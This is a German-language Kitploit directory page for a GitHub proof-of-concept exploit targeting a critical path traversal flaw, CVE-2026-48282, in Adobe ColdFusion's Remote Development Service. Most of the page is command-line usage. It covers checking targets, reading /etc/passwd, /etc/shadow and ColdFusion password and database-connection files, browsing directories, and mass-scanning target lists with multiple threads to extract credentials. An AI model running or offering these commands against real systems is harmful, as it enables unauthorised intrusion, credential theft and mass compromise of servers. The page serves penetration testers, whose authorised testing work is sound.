Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-48282 — Proof-of-Concept Exploit für CVE-2026-48282, ein kritischer Path Traversal in Adobe ColdFusion RDS, der nicht authentifiziertes Lesen/Schreiben von Dateien und RCE ermöglicht. Unterstützt Einzelziel- und Massen-Scanning mit mehrthreadiger Dateiextraktion. | Kitploit
Tools/GitHubGitHub/imbas007/cve-2026-48282
AufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubimbas007/cve-2026-48282

CVE-2026-48282

Proof-of-Concept Exploit für CVE-2026-48282, ein kritischer Path Traversal in Adobe ColdFusion RDS, der nicht authentifiziertes Lesen/Schreiben von Dateien und RCE ermöglicht. Unterstützt Einzelziel- und Massen-Scanning mit mehrthreadiger Dateiextraktion.

Repository anzeigen
246vor 1 MonatVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-48282-POC

CVE-2026-48282 ist eine Path-Traversal-Sicherheitslücke im Remote Development Service (RDS) von Adobe ColdFusion mit einem CVSS-Score von 10.0 (Kritisch). Sie ermöglicht nicht authentifizierten Angreifern, beliebige Dateien über den Endpunkt /CFIDE/main/ide.cfm zu lesen und zu schreiben, was zu Remote Code Execution (RCE) führt.

Installation

root@kitploit:~
# Clone the repository
git clone https://github.com/<username>/CVE-2026-48282.git
cd CVE-2026-48282

# Install dependencies (only requires `requests`)
pip install -r requirements.txt

Nutzung

Einzelnes Ziel (-t)

root@kitploit:~
# Check vulnerability
python cve-2026-48282.py -t https://target.com --check

# Read files
python cve-2026-48282.py -t https://target.com --read /etc/passwd
python cve-2026-48282.py -t https://target.com --read "C:\\Windows\\win.ini"
python cve-2026-48282.py -t https://target.com --read "C:\\ColdFusion2023\\cfusion\\lib\\password.properties"

# Browse directories
python cve-2026-48282.py -t https://target.com --browse "C:\\"
python cve-2026-48282.py -t https://target.com --browse "C:\\inetpub\\wwwroot"

Listenmodus (-l) — Mehrere Ziele scannen

root@kitploit:~

# Basic mass scan
python cve-2026-48282.py -l targets.txt --check

# More threads + save results
python cve-2026-48282.py -l targets.txt --check --threads 30 -o vuln.txt

# Scan + auto-read canary file on any vulnerable target found
python cve-2026-48282.py -l targets.txt --check --read "C:\\Windows\\win.ini" -o results.txt

Sensible Dateien lesen

root@kitploit:~

Once confirmed vulnerable, extract credentials and configuration:

# ColdFusion admin password hash
python cve-2026-48282.py -t http://target.com --read "C:\\CFusionMX7\\lib\\password.properties"

# Database connection strings (neo-query.xml)
python cve-2026-48282.py -t http://target.com --read "C:\\CFusionMX7\\lib\\neo-query.xml"

# Linux targets
python cve-2026-48282.py -t https://target.com --read /etc/passwd
python cve-2026-48282.py -t https://target.com --read /etc/shadow

Bild
Tool herunterladen